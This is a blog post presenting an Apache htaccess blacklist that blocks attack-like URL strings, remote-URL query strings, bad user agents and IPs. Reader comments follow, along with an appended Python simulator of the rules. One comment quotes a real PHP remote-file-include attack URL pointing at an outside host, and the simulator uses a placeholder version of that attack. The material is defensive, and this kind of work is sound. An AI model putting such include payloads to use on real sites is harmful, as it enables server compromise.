
Perishable Press 3G Blacklist


After much research and discussion, I have developed a concise, lightweight security strategy for Apache-powered websites. Prior to the development of this strategy, I relied on several extensive blacklists to protect my sites against malicious user agents and IP addresses.

Over time, these mega-lists became unmanageable and ineffective. As increasing numbers of attacks hit my server, I began developing new techniques for defending against external threats. This work soon culminated in the release of a “next-generation” blacklist that works by targeting common elements of decentralized server attacks.

Consisting of a mere 37 lines, this “2G” Blacklist provided enough protection to enable me to completely eliminate over 350 blacklisting directives from my site’s root htaccess file. This improvement increased site performance and decreased attack rates; however, many bad hits were still getting through. More work was needed.

The 3G Blacklist

Work on the 3G Blacklist required several weeks of research, testing, and analysis. During the development process, five major improvements were discovered, documented, and implemented. Using pattern recognition, access immunization, and multiple layers of protection, the 3G Blacklist serves as an extremely effective security strategy for preventing a vast majority of common exploits. The list consists of four distinct parts, providing multiple layers of protection while synergizing into a comprehensive defense mechanism. Further, as discussed in previous articles, the 3G Blacklist is designed to be as lightweight and flexible as possible, thereby facilitating periodic cultivation and maintenance. Sound good? Here it is:

# PERISHABLE PRESS 3G BLACKLIST

# PART I: CHARACTER STRINGS
<IfModule mod_alias.c>
 RedirectMatch 403 \:
 RedirectMatch 403 \;
 RedirectMatch 403 \<
 RedirectMatch 403 \>
 RedirectMatch 403 \/\,
 RedirectMatch 403 \/\/
 RedirectMatch 403 f\-\.
 RedirectMatch 403 \.\.\.
 RedirectMatch 403 \.inc
 RedirectMatch 403 alt\=
 RedirectMatch 403 ftp\:
 RedirectMatch 403 ttp\:
 RedirectMatch 403 \.\$url
 RedirectMatch 403 \/\$url
 RedirectMatch 403 \/\$link
 RedirectMatch 403 news\.php
 RedirectMatch 403 menu\.php
 RedirectMatch 403 main\.php
 RedirectMatch 403 home\.php
 RedirectMatch 403 view\.php
 RedirectMatch 403 about\.php
 RedirectMatch 403 blank\.php
 RedirectMatch 403 block\.php
 RedirectMatch 403 order\.php
 RedirectMatch 403 search\.php
 RedirectMatch 403 errors\.php
 RedirectMatch 403 button\.php
 RedirectMatch 403 middle\.php
 RedirectMatch 403 threads\.php
 RedirectMatch 403 contact\.php
 RedirectMatch 403 include\.php
 RedirectMatch 403 display\.php
 RedirectMatch 403 register\.php
 RedirectMatch 403 authorize\.php
 RedirectMatch 403 \/wp\-signup\.php
 RedirectMatch 403 \/classes\/
 RedirectMatch 403 \/includes\/
 RedirectMatch 403 \/path\_to\_script\/
 RedirectMatch 403 ImpEvData\.
 RedirectMatch 403 head\_auth\.
 RedirectMatch 403 db\_connect\.
 RedirectMatch 403 check\_proxy\.
 RedirectMatch 403 doeditconfig\.
 RedirectMatch 403 submit\_links\.
 RedirectMatch 403 change\_action\.
 RedirectMatch 403 send\_reminders\.
 RedirectMatch 403 comment\-template\.
 RedirectMatch 403 syntax\_highlight\.
 RedirectMatch 403 admin\_db\_utilities\.
 RedirectMatch 403 admin\.webring\.docs\.
 RedirectMatch 403 function\.main
 RedirectMatch 403 function\.mkdir
 RedirectMatch 403 function\.opendir
 RedirectMatch 403 function\.require
 RedirectMatch 403 function\.array\-rand
 RedirectMatch 403 ref\.outcontrol
</IfModule>

# PART II: QUERY STRINGS
<IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteCond %{QUERY_STRING} ftp\:   [NC,OR]
 RewriteCond %{QUERY_STRING} http\:  [NC,OR]
 RewriteCond %{QUERY_STRING} https\: [NC,OR]
 RewriteCond %{QUERY_STRING} \[      [NC,OR]
 RewriteCond %{QUERY_STRING} \]      [NC]
 RewriteRule .* -                    [F,L]
</IfModule>

# PART III: USER AGENTS
SetEnvIfNoCase User-Agent "Jakarta Commons" keep_out
SetEnvIfNoCase User-Agent "Y!OASIS/TEST"    keep_out
SetEnvIfNoCase User-Agent "libwww-perl"     keep_out
SetEnvIfNoCase User-Agent "MOT-MPx220"      keep_out
SetEnvIfNoCase User-Agent "MJ12bot"         keep_out
SetEnvIfNoCase User-Agent "Nutch"           keep_out
SetEnvIfNoCase User-Agent "cr4nk"           keep_out
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from env=keep_out
</Limit>

# PART IV: IP ADDRESSES
# (comments are kept on their own lines: Apache reads any trailing text
# after "deny from" as further host arguments, not as a comment)
<Limit GET POST PUT>
 order allow,deny
 allow from all
 # blacklist candidate 2008-01-02 = admin-ajax.php attack
 deny from 75.126.85.215
 # blacklist candidate 2008-02-10 = cryptic character strings
 deny from 128.111.48.138
 # blacklist candidate 2008-03-09 = block administrative attacks
 deny from 87.248.163.54
 # blacklist candidate 2008-04-27 = block clam store loser
 deny from 84.122.143.99
</Limit>

Installation and Usage

Before using the 3G Blacklist, check the following system requirements:

  • Linux server running Apache
  • Enabled Apache module: mod_alias
  • Enabled Apache module: mod_rewrite
  • Ability to edit your site’s root htaccess file (or)
  • Ability to modify Apache’s server configuration file

With these requirements met, copy and paste the entire 3G Blacklist into either the root htaccess file or the server configuration file. After uploading, visit your site and check proper loading of as many different types of pages as possible. For example, if you are running a blogging platform (such as WordPress), test different page views (single, archive, category, home, etc.), log into and surf the admin pages (plugins, themes, options, posts, etc.), and also check peripheral elements such as individual images, available downloads, and alternate protocols (FTP, HTTPS, etc.).

While the 3G Blacklist is designed to target only the bad guys, the regular expressions used in the list may interfere with legitimate URL access. If this happens, the browsing device will display a 403 Forbidden error. Don’t panic! Simply check the blocked URL, locate the matching blacklist string, and disable the directive by placing a pound sign ( # ) at the beginning of the associated line. Once the correct line is commented out, the blocked URL should load normally. Also, if you do happen to experience any conflicts involving the 3G Blacklist, please leave a comment or contact me directly. Thank you :)

Wrap Up

As my readers know, I am serious about site security. Nothing gets my adrenaline pumping more than the thought of a giant meat grinder squirting out endless chunks of mangled cracker meat. Spam and other exploitative activity on the web has grown exponentially. Targeting and blocking individual agents and IPs is no longer a viable strategy. By recognizing and immunizing against the broadest array of common attack elements, the 3G Blacklist maximizes resources while providing solid defense against malicious attacks.

Updates

Updates to the 3G Blacklist/firewall:

2008/05/14

Removed “RedirectMatch 403 \/scripts\/” from the first part of the blacklist due to conflict with Mint Statistics.

2008/05/18

Removed the following three directives to facilitate Joomla functionality:

RedirectMatch 403 \/modules\/
RedirectMatch 403 \/components\/
RedirectMatch 403 \/administrator\/

2008/05/31

Removed “RedirectMatch 403 config\.php” from the first part of the list to ensure proper functionality with the “visual-editing” feature of the WordPress Admin Area.

Jeff Starr
About the Author Jeff Starr = Web Developer. Security Specialist. WordPress Buff.
84 responses
  1. Jeff Starr

    Hi Denny, thanks for the information.. I have been wanting to setup something similar on one of my other sites for quite awhile now. I assume that the video is a live stream and not some pre-recorded footage..? The software looks easy enough, and the embedding seems straightforward, but I imagine that setting up a secure personal server would require some time..

    In any case, I think that personal live streaming video will become all the rage, just as soon as the technology makes it easy for “everyone” to do!

  2. Denny Smith October 26, 2008 @ 9:39 am

    Jeff,

    That’s correct. It is live video. I am using several things. One is no-ip to mask my actual IP address as well as a static IP port forwarded through 2 routers in a local network. (That was a pain sort of) but a DNS redirect is probably the best advice as far as securing the connection. After all, you essentially open a port on your computer. I had to hack my registry a bit to allow more than 2 connections to come in. I am thinking about writing a tutorial on the process that would better explain how I am doing this.

    By the way, I emailed you a copy of my wp-admin but it must have tagged it as spam.

    wp-admin.php was renamed to fx_wp-admin.php and contained code like this?

    ' //eval($code);
       } else {
          testdata('save_fail');
       };
    '
    Any suggestion on removing this type of hack?

    Thanks!

  3. Thank you, very interesting article. But I’m sorry because I’m on a Windows server and I use IIS.. by chance, have you ever translated your method for IIS? :-)

  4. Regarding IIS – there is no easy or free way of doing the same thing.

    You would either have to build something in ASP/.NET which would look at your request parameters and do all the required tests – or purchase a product like http://www.isapirewrite.com/ and then build all the filters you need yourself.

  5. Jeff Starr

    @Denny: Hmm, I haven’t seen that type of hack before, however I would be more than happy to look at your file if you resend it (zipped!) or post it somewhere on the net..

    As for a tutorial on your video streaming technique, I would love to see it, as would many others, I assume. Although one thing I have noticed when visiting your site is that the stream is not always active. On several occasions, the video tries to load but then ends up with just a blank screen..

  6. @Jeff : thank you for your kind reply. My provider supports isapirewrite, but maybe I should study a bit to translate your list in my httpd.ini… :-)
    have a good blogging!

  7. Re: # PART IV: IP ADDRESSES

    I have found another very effective way to deal with blocking IPs from scumbags, remarkably in the Apache docs.

    First you create a hosts.deny file and add the restricted IPs

    190.176.128.6 -
    190.176.176.15 -
    190.176.150.150 -
    190.176.138.63 -

    Next you add a rule to your vhost config file or server main config.

    RewriteEngine on
    RewriteMap hosts-deny txt:/path/to/hosts.deny
    RewriteCond ${hosts-deny:%{REMOTE_ADDR}|NOT-FOUND} !=NOT-FOUND
    RewriteRule ^/.* - [F]

    The nice thing about this is you can add IPs and the rule is enforced immediately.

  8. Jeff Starr

    @Peter: Thanks for the tip! That looks like a potentially useful method of blocking IPs, however keep in mind that not everyone has access to the server configuration file(s). Also note that rules added directly to individual htaccess files are also “enforced immediately.” Great tip though — thanks for sharing! :)

  9. The same code could be used from a .htaccess file. The problem using .htaccess files is the server has to work looking for more controls up the path unless you use AllowOverride None at the bottom of your file. This will however render any other .htaccess files useless in higher directories.

  10. By the way Jeff. I found the culprit. Someone uploaded a C99madShell v. 2.0 madnet edition to my server. How could they get that on my server?

  11. Jeff Starr

    @Peter: Thanks for the follow-up! Although deny (and other blacklisting) directives are typically implemented in the root htaccess file, so generally there is no need for the server to do any extra work, as far as I know..

    @Denny: That’s crazy! Sounds like a serious security breach, if you ask me. If your site is otherwise secure, I wouldn’t rule out malicious activity from the admin/tech staff of your current hosting provider (unless you are self-hosted of course)..

  12. Hi,

    Thanks for the Tips.

    The RedirectMatch 403 // does not work on this attack:
    http://www.mydomainname.com/request/playing.php/playing.php/common/db.php?commonpath=http://mun-hwa.com/bbs/kombi.txt?”

    But RedirectMatch 403 db.php works, and the most important thing is to block outgoing traffic on the server on port 80 so the server cannot get this URL:
    http://mun-hwa.com/bbs/kombi.txt?” :-)
    I think the firewall works for most PHP include attacks.

    Also I use OSSEC to find attacks!

    Thanks for helping! And I hope to find more tips here in the future!
    Great job!

    Michel
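The following Python script is an added example, not code from the post or from Perishable Press. It models how the four parts of the 3G Blacklist decide a request, so that the pre-deployment check described under Installation and Usage (walk through the pages your site must serve and note which directive blocks any of them) can be done offline. It serves three passages at once: the blacklist and its testing advice, the RewriteMap txt-file approach from comment 7 (the map lookup with a NOT-FOUND default), and the behaviour reported in comment 12. That last point is the one a troubleshooter needs: mod_alias RedirectMatch matches the decoded URL path only, so a `//` that appears only in the query string never triggers the Part I `\/\/` directive; it is Part II's `http\:` condition on QUERY_STRING that catches it. Assumptions: only a representative subset of the Part I patterns is embedded (marked in the code), the deny-map addresses and all request samples are constructed, `example.invalid` is a reserved placeholder host, and the parts are checked in the page's order with the first match reported, whereas Apache evaluates these modules in different request phases (the result is a 403 either way).

```python
"""Offline simulator for the four parts of the 3G Blacklist (added example)."""
import re
from urllib.parse import unquote, urlsplit

# Representative subset of the page's Part I directives (assumption: not the
# full list). RedirectMatch tests the decoded URL path only; the query string
# never takes part in this match.
PART1_PATH = [r"\:", r"\;", r"\<", r"\>", r"\/\,", r"\/\/", r"\.\.\.", r"\.inc",
              r"\/\$url", r"\/includes\/", r"db\_connect\.", r"function\.require"]

# Part II: RewriteCond %{QUERY_STRING} patterns, all flagged [NC] (case-insensitive).
PART2_QUERY = [r"ftp\:", r"http\:", r"https\:", r"\[", r"\]"]

# Part III: SetEnvIfNoCase User-Agent regexes (case-insensitive, unanchored).
PART3_UA = ["Jakarta Commons", "libwww-perl", "MJ12bot", "Nutch", "cr4nk"]

# Part IV written as a RewriteMap txt file, as in comment 7: "key value" per
# line, "#" lines ignored. The addresses are constructed documentation samples.
HOSTS_DENY = """\
# constructed sample map, not the page's list
198.51.100.7 -
203.0.113.9 -
"""

# <Limit GET POST PUT> restricts only the listed methods; Apache applies a GET
# limit to HEAD as well. Any other method bypasses Parts III and IV entirely.
LIMITED_METHODS = {"GET", "HEAD", "POST", "PUT"}


def lookup_txt_map(map_text, key, default="NOT-FOUND"):
    """Mimic ${map:key|default} for a txt: RewriteMap."""
    for line in map_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 1)
        if len(fields) == 2 and fields[0] == key:
            return fields[1].strip()
    return default


def evaluate(method, url, user_agent="", remote_addr="0.0.0.0", hosts_deny=HOSTS_DENY):
    """Return (status, reason) for one request, checking the parts in the
    page's order and reporting the first directive that fires."""
    parts = urlsplit(url)
    path = unquote(parts.path)          # what RedirectMatch actually sees
    for pat in PART1_PATH:
        if re.search(pat, path):
            return 403, f"Part I: RedirectMatch 403 {pat}"
    for pat in PART2_QUERY:             # query string only, [NC]
        if re.search(pat, parts.query, re.IGNORECASE):
            return 403, f"Part II: RewriteCond %{{QUERY_STRING}} {pat}"
    if method.upper() in LIMITED_METHODS:
        for pat in PART3_UA:
            if re.search(pat, user_agent, re.IGNORECASE):
                return 403, f"Part III: User-Agent matches {pat}"
        if lookup_txt_map(hosts_deny, remote_addr) != "NOT-FOUND":
            return 403, f"Part IV: deny from {remote_addr}"
    return 200, "allowed"


def false_positive_report(legit_urls, user_agent="Mozilla/5.0", remote_addr="192.0.2.10"):
    """The Installation and Usage check: run the URLs your own site must serve
    and return each one that would 403, with the directive to comment out."""
    blocked = {}
    for url in legit_urls:
        status, reason = evaluate("GET", url, user_agent, remote_addr)
        if status == 403:
            blocked[url] = reason
    return blocked


if __name__ == "__main__":
    # Constructed sample pages a WordPress site would have to serve.
    site_pages = ["/", "/about/", "/2008/05/3g-blacklist/",
                  "/wp-admin/edit.php?post_type=page",
                  "/wp-content/plugins/some-plugin/includes/style.css"]
    for url, why in false_positive_report(site_pages).items():
        print(f"would block {url}: {why}")
    # The "//" sits in the query string, so Part I's \/\/ never sees it;
    # Part II's http\: condition is what fires.
    print(evaluate("GET", "/request/playing.php/common/db.php"
                          "?commonpath=http://example.invalid/k.txt"))
    print(evaluate("GET", "/", "Mozilla/5.0 (compatible; MJ12bot/v1.4)"))
    print(evaluate("GET", "/", "Mozilla/5.0", "198.51.100.7"))
    print(evaluate("OPTIONS", "/", "Mozilla/5.0", "198.51.100.7"))  # outside <Limit>
```

Run the script as-is to see the report; in practice, replace `site_pages` with a crawl of your own site's URLs (archives, admin screens, theme and plugin assets) before the list goes live. The `/includes/` hit on a plugin stylesheet is the kind of conflict the Updates section records for `/modules/` and `/components/` under Joomla. The OPTIONS case is the caveat worth remembering about `<Limit>`: the user-agent and IP denies apply only to the listed methods, which is why Apache's documentation generally recommends `<LimitExcept>` or an unconditional scope for access control.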
